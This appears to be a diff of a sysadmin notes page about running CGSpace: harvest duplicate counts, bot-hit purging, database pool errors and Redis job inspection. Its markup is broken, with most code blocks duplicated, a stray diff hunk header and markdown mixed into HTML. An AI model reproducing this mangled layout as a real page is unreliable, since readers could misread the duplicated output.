$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort -u | wc -l
85709
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>90937
</span></span><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort -u | wc -l
</span></span><span style="display:flex;"><span>85709
</span></span></code></pre></div><ul>
- So those could be duplicates from the way we harvest pages, but they could also be from mappings...
  - Manually inspecting the duplicates where handles appear more than once:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort | uniq -c | sort -h
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;CGSpace&#34;&#39;</span> openrxv-items_data.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:alnum:]]+&#34;&#39;</span> | sort | uniq -c | sort -h
</span></span></code></pre></div><ul>
- Unfortunately I found no pattern:
  - Some appear twice in the Elasticsearch index, but appear in only one collection (a quick membership check is sketched below)
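- A quick way to check collection membership for one of the duplicated handles is the legacy REST API's `parentCollectionList` expand; a sketch, using one of the handles from the list above:

```console
$ curl -s -H "Accept: application/json" "https://cgspace.cgiar.org/rest/handle/10568/102093?expand=parentCollectionList" | jq '.parentCollectionList[].handle'
```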
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
5
$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
&#34;10673/4&#34;
&#34;10673/3&#34;
&#34;10673/6&#34;
&#34;10673/5&#34;
&#34;10673/7&#34;
# log into DSpace Demo XMLUI as admin and make one item private <span style="color:#f92672">(</span><span style="color:#66d9ef">for</span> example 10673/6<span style="color:#f92672">)</span>
$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
4
$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
&#34;10673/4&#34;
&#34;10673/3&#34;
&#34;10673/5&#34;
&#34;10673/7&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
</span></span><span style="display:flex;"><span>5
</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
</span></span><span style="display:flex;"><span>&#34;10673/4&#34;
</span></span><span style="display:flex;"><span>&#34;10673/3&#34;
</span></span><span style="display:flex;"><span>&#34;10673/6&#34;
</span></span><span style="display:flex;"><span>&#34;10673/5&#34;
</span></span><span style="display:flex;"><span>&#34;10673/7&#34;
</span></span><span style="display:flex;"><span># log into DSpace Demo XMLUI as admin and make one item private <span style="color:#f92672">(</span><span style="color:#66d9ef">for</span> example 10673/6<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
</span></span><span style="display:flex;"><span>4
</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
</span></span><span style="display:flex;"><span>&#34;10673/4&#34;
</span></span><span style="display:flex;"><span>&#34;10673/3&#34;
</span></span><span style="display:flex;"><span>&#34;10673/5&#34;
</span></span><span style="display:flex;"><span>&#34;10673/7&#34;
</span></span></code></pre></div><ul>
- I tested the pull request on DSpace Test and it works, so I left a note on GitHub and Jira
- Last week I noticed that the Gender Platform website is using "cgspace.cgiar.org" links for CGSpace, instead of handles
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | wc -l
90327
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | sort -u | wc -l
90317
</code></pre></div><h2 id="2021-06-22">2021-06-22</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | wc -l
</span></span><span style="display:flex;"><span>90327
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | sort -u | wc -l
</span></span><span style="display:flex;"><span>90317
</span></span></code></pre></div><h2 id="2021-06-22">2021-06-22</h2>
<ul>
<li>Make a <a href="https://github.com/atmire/COUNTER-Robots/pull/43">pull request</a> to the COUNTER-Robots project to add two new user agents: crusty and newspaper
<ul>
@ -368,13 +368,13 @@ $ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 1339 hits from RI\/1\.0 in statistics
Purging 447 hits from crusty in statistics
Purging 3736 hits from newspaper in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 5522
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 1339 hits from RI\/1\.0 in statistics
</span></span><span style="display:flex;"><span>Purging 447 hits from crusty in statistics
</span></span><span style="display:flex;"><span>Purging 3736 hits from newspaper in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 5522
</span></span></code></pre></div><ul>
- Surprised to see RI/1.0 in there because it's been in the override file for a while
- Looking at the 2021 statistics in Solr I see a few more suspicious user agents (a facet query for skimming them is sketched below)
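- For reference, a facet query is a handy way to skim the user agents in the statistics core; a sketch, assuming Solr is listening on localhost:8081 as elsewhere in this setup:

```console
$ curl -s 'http://localhost:8081/solr/statistics/select' \
    --data-urlencode 'q=time:[2021-01-01T00:00:00Z TO *]' \
    --data-urlencode 'rows=0' \
    --data-urlencode 'facet=true' \
    --data-urlencode 'facet.field=userAgent' \
    --data-urlencode 'facet.limit=30' \
    --data-urlencode 'wt=json'
```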
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># journalctl --since<span style="color:#f92672">=</span>today -u tomcat7 | grep -c <span style="color:#e6db74">&#39;Connection has been abandoned&#39;</span>
978
$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
10100
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># journalctl --since<span style="color:#f92672">=</span>today -u tomcat7 | grep -c <span style="color:#e6db74">&#39;Connection has been abandoned&#39;</span>
</span></span><span style="display:flex;"><span>978
</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>10100
</span></span></code></pre></div><ul>
- I sent a message to Atmire, hoping that the database logging they put in place last time this happened will be of help now
- In the meantime, I decided to upgrade Tomcat from 7.0.107 to 7.0.109, and the PostgreSQL JDBC driver from 42.2.20 to 42.2.22 (first on DSpace Test)
- I also applied several patches from the 6.4 milestone to our `6_x-prod` branch
- After upgrading and restarting Tomcat the database connections and locks were back down to normal levels:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
63
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>63
</span></span></code></pre></div><ul>
- Looking in the DSpace log, the first "pool empty" message I saw this morning was at 4AM:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</span></span></code></pre></div><ul>
- Oh, and I notice 8,000 hits from a Flipboard bot using this user-agent:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
</span></span></code></pre></div><ul>
- We can purge them, as this is not user traffic: <https://about.flipboard.com/browserproxy/>
  - I will add it to our local user agent pattern file and eventually submit a pull request to COUNTER-Robots (a sketch of that is below)
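- A minimal sketch of that workflow, assuming the same override file and script used above (the entry just needs to match the agent string, like the patterns in the purge output earlier):

```console
$ echo 'FlipboardProxy' >> dspace/config/spiders/agents/ilri
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
```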
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | wc -l
104797
$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
99186
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | wc -l
</span></span><span style="display:flex;"><span>104797
</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>99186
</span></span></code></pre></div><ul>
- This number is probably unique for that particular harvest, but I don't think it represents the true number of items...
- The harvest of DSpace Test I did on my local test instance yesterday has about 91,000 items:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;DSpace Test&#34;&#39;</span> 2021-06-23-openrxv-items-final-local.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> | sort | uniq | wc -l
90990
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;DSpace Test&#34;&#39;</span> 2021-06-23-openrxv-items-final-local.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>90990
</span></span></code></pre></div><ul>
- So the harvest on the live site is missing items, then why didn't the add missing items plugin find them?!
  - I notice that we are missing the `type` in the metadata structure config for each repository on the production site, and we are using `type` for item type in the actual schema... so maybe there is a conflict there
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] &#34;GET /sitemap HTTP/1.1&#34; 503 190 &#34;-&#34; &#34;OpenRXV harvesting bot; https://github.com/ilri/OpenRXV&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] &#34;GET /sitemap HTTP/1.1&#34; 503 190 &#34;-&#34; &#34;OpenRXV harvesting bot; https://github.com/ilri/OpenRXV&#34;
</span></span></code></pre></div><ul>
- I fixed nginx so it always allows people to get the sitemap and then re-ran the plugins... now it's checking 180,000+ handles to see if they are collections or items...
  - I see it fetched the sitemap three times; we need to make sure it's only doing it once for each repository
- According to the API logs we will be adding 5,697 items:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker logs api 2&gt;/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
5697
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker logs api 2&gt;/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5697
</span></span></code></pre></div><ul>
- Spent a few hours with Moayad troubleshooting and improving OpenRXV
  - We found a bug in the harvesting code that can occur when you are harvesting DSpace 5 and DSpace 6 instances, as DSpace 5 uses numeric (long) IDs, and DSpace 6 uses UUIDs
- Poking around at the plugin jobs in Redis:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ redis-cli
127.0.0.1:6379&gt; SCAN 0 COUNT 5
1) &#34;49152&#34;
2) 1) &#34;bull:plugins:476595&#34;
2) &#34;bull:plugins:367382&#34;
3) &#34;bull:plugins:369228&#34;
4) &#34;bull:plugins:438986&#34;
5) &#34;bull:plugins:366215&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ redis-cli
</span></span><span style="display:flex;"><span>127.0.0.1:6379&gt; SCAN 0 COUNT 5
</span></span><span style="display:flex;"><span>1) &#34;49152&#34;
</span></span><span style="display:flex;"><span>2) 1) &#34;bull:plugins:476595&#34;
</span></span><span style="display:flex;"><span> 2) &#34;bull:plugins:367382&#34;
</span></span><span style="display:flex;"><span> 3) &#34;bull:plugins:369228&#34;
</span></span><span style="display:flex;"><span> 4) &#34;bull:plugins:438986&#34;
</span></span><span style="display:flex;"><span> 5) &#34;bull:plugins:366215&#34;
</span></span></code></pre></div><ul>
- We can apparently get the names of the jobs in each hash using `hget`:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">127.0.0.1:6379&gt; TYPE bull:plugins:401827
hash
127.0.0.1:6379&gt; HGET bull:plugins:401827 name
&#34;dspace_add_missing_items&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>127.0.0.1:6379&gt; TYPE bull:plugins:401827
</span></span><span style="display:flex;"><span>hash
</span></span><span style="display:flex;"><span>127.0.0.1:6379&gt; HGET bull:plugins:401827 name
</span></span><span style="display:flex;"><span>&#34;dspace_add_missing_items&#34;
</span></span></code></pre></div><ul>
- I whipped up a one-liner to get the keys for all plugin jobs, convert them to redis `HGET` commands to extract the value of the name field, and then sort them by their counts:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ redis-cli KEYS <span style="color:#e6db74">&#34;bull:plugins:*&#34;</span> <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span> | sed -e &#39;s/^bull/HGET bull/&#39; -e &#39;s/\([[:digit:]]\)$/\1 name/&#39; \
| ncat -w 3 localhost 6379 \
| grep -v -E &#39;^\$&#39; | sort | uniq -c | sort -h
3 dspace_health_check
4 -ERR wrong number of arguments for &#39;hget&#39; command
12 mel_downloads_and_views
129 dspace_altmetrics
932 dspace_downloads_and_views
186428 dspace_add_missing_items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ redis-cli KEYS <span style="color:#e6db74">&#34;bull:plugins:*&#34;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> | sed -e &#39;s/^bull/HGET bull/&#39; -e &#39;s/\([[:digit:]]\)$/\1 name/&#39; \
</span></span><span style="display:flex;"><span> | ncat -w 3 localhost 6379 \
</span></span><span style="display:flex;"><span> | grep -v -E &#39;^\$&#39; | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 3 dspace_health_check
</span></span><span style="display:flex;"><span> 4 -ERR wrong number of arguments for &#39;hget&#39; command
</span></span><span style="display:flex;"><span> 12 mel_downloads_and_views
</span></span><span style="display:flex;"><span> 129 dspace_altmetrics
</span></span><span style="display:flex;"><span> 932 dspace_downloads_and_views
</span></span><span style="display:flex;"><span> 186428 dspace_add_missing_items
</span></span></code></pre></div><ul>
- Note that this uses `ncat` to send commands directly to redis all at once instead of one at a time (`netcat` didn't work here, as it doesn't know when our input is finished and never quits)
  - I thought of using `redis-cli --pipe`, but then you have to construct the commands in the redis protocol format with the number of args and length of each command
  - A simpler but much slower alternative is sketched below
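- For comparison, a minimal sketch that sidesteps the protocol question entirely by invoking `redis-cli` once per key (fine for a one-off, but painful with 186,000+ keys since it spawns one process each):

```console
$ for key in $(redis-cli KEYS 'bull:plugins:*'); do redis-cli HGET "$key" name; done | sort | uniq -c | sort -h
```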
- Looking at the DSpace log I see there was definitely a higher number of sessions that day, perhaps twice the normal:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ <span style="color:#66d9ef">for</span> file in dspace.log.2021-06-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span>; grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
dspace.log.2021-06-10
19072
dspace.log.2021-06-11
19224
dspace.log.2021-06-12
19215
dspace.log.2021-06-13
16721
dspace.log.2021-06-14
17880
dspace.log.2021-06-15
12103
dspace.log.2021-06-16
4651
dspace.log.2021-06-17
22785
dspace.log.2021-06-18
21406
dspace.log.2021-06-19
25967
dspace.log.2021-06-20
20850
dspace.log.2021-06-21
6388
dspace.log.2021-06-22
5945
dspace.log.2021-06-23
46371
dspace.log.2021-06-24
9024
dspace.log.2021-06-25
12521
dspace.log.2021-06-26
16163
dspace.log.2021-06-27
5886
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in dspace.log.2021-06-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span>; grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>dspace.log.2021-06-10
</span></span><span style="display:flex;"><span>19072
</span></span><span style="display:flex;"><span>dspace.log.2021-06-11
</span></span><span style="display:flex;"><span>19224
</span></span><span style="display:flex;"><span>dspace.log.2021-06-12
</span></span><span style="display:flex;"><span>19215
</span></span><span style="display:flex;"><span>dspace.log.2021-06-13
</span></span><span style="display:flex;"><span>16721
</span></span><span style="display:flex;"><span>dspace.log.2021-06-14
</span></span><span style="display:flex;"><span>17880
</span></span><span style="display:flex;"><span>dspace.log.2021-06-15
</span></span><span style="display:flex;"><span>12103
</span></span><span style="display:flex;"><span>dspace.log.2021-06-16
</span></span><span style="display:flex;"><span>4651
</span></span><span style="display:flex;"><span>dspace.log.2021-06-17
</span></span><span style="display:flex;"><span>22785
</span></span><span style="display:flex;"><span>dspace.log.2021-06-18
</span></span><span style="display:flex;"><span>21406
</span></span><span style="display:flex;"><span>dspace.log.2021-06-19
</span></span><span style="display:flex;"><span>25967
</span></span><span style="display:flex;"><span>dspace.log.2021-06-20
</span></span><span style="display:flex;"><span>20850
</span></span><span style="display:flex;"><span>dspace.log.2021-06-21
</span></span><span style="display:flex;"><span>6388
</span></span><span style="display:flex;"><span>dspace.log.2021-06-22
</span></span><span style="display:flex;"><span>5945
</span></span><span style="display:flex;"><span>dspace.log.2021-06-23
</span></span><span style="display:flex;"><span>46371
</span></span><span style="display:flex;"><span>dspace.log.2021-06-24
</span></span><span style="display:flex;"><span>9024
</span></span><span style="display:flex;"><span>dspace.log.2021-06-25
</span></span><span style="display:flex;"><span>12521
</span></span><span style="display:flex;"><span>dspace.log.2021-06-26
</span></span><span style="display:flex;"><span>16163
</span></span><span style="display:flex;"><span>dspace.log.2021-06-27
</span></span><span style="display:flex;"><span>5886
</span></span></code></pre></div><ul>
- I see 15,000 unique IPs in the XMLUI logs alone on that day:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
15835
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>15835
</span></span></code></pre></div><ul>
- Annoyingly I found 37,000 more hits from Bing using `dns:*msnbot* AND dns:*.msn.com.` as a Solr filter
  - WTF, they are using a normal user agent: `Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko`
  - Since `check-spider-hits.sh` matches on user agents, these would need to be purged directly in Solr (see the sketch below)
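- A sketch of a direct delete-by-query against the statistics core, assuming Solr on localhost:8081 as above (worth dry-running the same query with `/select` first, since deletes are irreversible):

```console
$ curl -s 'http://localhost:8081/solr/statistics/update?commit=true' \
    -H 'Content-Type: text/xml' \
    --data-binary '<delete><query>dns:*msnbot* AND dns:*.msn.com.</query></delete>'
```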
- The DSpace log shows:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</span></span></code></pre></div><ul>
- The first one of these I see is from last night, 2021-06-29, at 10:47 PM
- I restarted Tomcat 7 and CGSpace came back up...
- I didn't see that Atmire had responded last week (on 2021-06-23) about the issues we had
- Export a list of all CGSpace's AGROVOC keywords with counts for Enrico and Elizabeth Arnaud to discuss with AGROVOC:
